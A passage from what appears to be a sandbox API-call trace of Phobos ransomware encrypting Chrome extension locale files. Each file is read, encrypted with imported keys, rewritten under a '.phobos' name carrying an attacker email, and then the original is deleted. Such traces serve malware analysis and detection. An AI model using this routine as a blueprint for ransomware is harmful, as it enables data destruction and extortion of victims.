"c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.290] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.290] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.290] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.290] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x403a, lpOverlapped=0x0) returned 1 [0164.757] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4040, dwBufLen=0x4040 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x4040) returned 1 [0164.757] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x4040, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x4040, lpOverlapped=0x0) returned 1 [0164.758] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.758] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.758] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.758] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.758] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.759] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.759] CloseHandle (hObject=0x134) returned 1 [0164.759] CloseHandle (hObject=0x17c) returned 1 [0164.759] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ko\\messages.json")) returned 1 [0164.760] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.760] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.760] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16831) returned 1 [0164.760] CloseHandle (hObject=0x17c) returned 1 [0164.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json")) returned 0x2020 [0164.761] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.761] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.761] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.761] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.761] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.761] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.761] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x41bf, lpOverlapped=0x0) returned 1 [0164.802] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x41c0, dwBufLen=0x41c0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x41c0) returned 1 [0164.802] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x41c0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x41c0, lpOverlapped=0x0) returned 1 [0164.803] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.803] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.803] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.803] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.803] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.803] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.803] CloseHandle (hObject=0x17c) returned 1 [0164.803] CloseHandle (hObject=0x134) returned 1 [0164.804] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\lv\\messages.json")) returned 1 [0164.804] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.804] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.805] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=21028) returned 1 [0164.805] CloseHandle (hObject=0x134) returned 1 [0164.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json")) returned 0x2020 [0164.805] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.805] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.806] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.806] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.806] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.806] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.806] ReadFile (in: hFile=0x134, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x5224, lpOverlapped=0x0) returned 1 [0164.815] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5230, dwBufLen=0x5230 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x5230) returned 1 [0164.815] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x5230, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x5230, lpOverlapped=0x0) returned 1 [0164.816] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.816] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.816] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.816] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.816] WriteFile (in: hFile=0x17c, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.816] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.816] CloseHandle (hObject=0x134) returned 1 [0164.816] CloseHandle (hObject=0x17c) returned 1 [0164.816] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json")) returned 1 [0164.817] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.817] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.818] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16060) returned 1 [0164.818] CloseHandle (hObject=0x17c) returned 1 [0164.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json")) returned 0x2020 [0164.818] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.818] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.818] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.818] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.818] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa60, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fabc | out: phKey=0x2a0fabc*=0xa32968) returned 1 [0164.819] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.819] ReadFile (in: hFile=0x17c, lpBuffer=0x3190020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2a0fae4, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesRead=0x2a0fae4*=0x3ebc, lpOverlapped=0x0) returned 1 [0164.820] CryptEncrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3ec0, dwBufLen=0x3ec0 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x3ec0) returned 1 [0164.820] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0x3ec0, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0x3ec0, lpOverlapped=0x0) returned 1 [0164.821] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2a0fa54, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2a0fac0 | out: phKey=0x2a0fac0*=0xa32ca8) returned 1 [0164.821] CryptSetKeyParam (hKey=0xa32ca8, dwParam=0x1, pbData=0x2a0fb68, dwFlags=0x0) returned 1 [0164.821] CryptEncrypt (in: hKey=0xa32ca8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40, dwBufLen=0x40 | out: pbData=0x3190020*, pdwDataLen=0x2a0fa80*=0x40) returned 1 [0164.821] CryptDestroyKey (hKey=0xa32ca8) returned 1 [0164.821] WriteFile (in: hFile=0x134, lpBuffer=0x3190020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x2a0fac8, lpOverlapped=0x0 | out: lpBuffer=0x3190020*, lpNumberOfBytesWritten=0x2a0fac8*=0xf2, lpOverlapped=0x0) returned 1 [0164.821] CryptDestroyKey (hKey=0xa32968) returned 1 [0164.821] CloseHandle (hObject=0x17c) returned 1 [0164.821] CloseHandle (hObject=0x134) returned 1 [0164.821] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nb\\messages.json")) returned 1 [0164.823] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2a0fb68 | out: pbBuffer=0x2a0fb68) returned 1 [0164.823] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.823] GetFileSizeEx (in: hFile=0x134, lpFileSize=0x2a0fb08 | out: lpFileSize=0x2a0fb08*=16197) returned 1 [0164.823] CloseHandle (hObject=0x134) returned 1 [0164.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json")) returned 0x2020 [0164.823] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0164.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x134 [0164.824] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.824] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2a0faa8 | out: lpNewFilePointer=0x0) returned 1 [0164.824] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\nl\\messages.json.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x17c [0164.824] CryptImportKey (in: 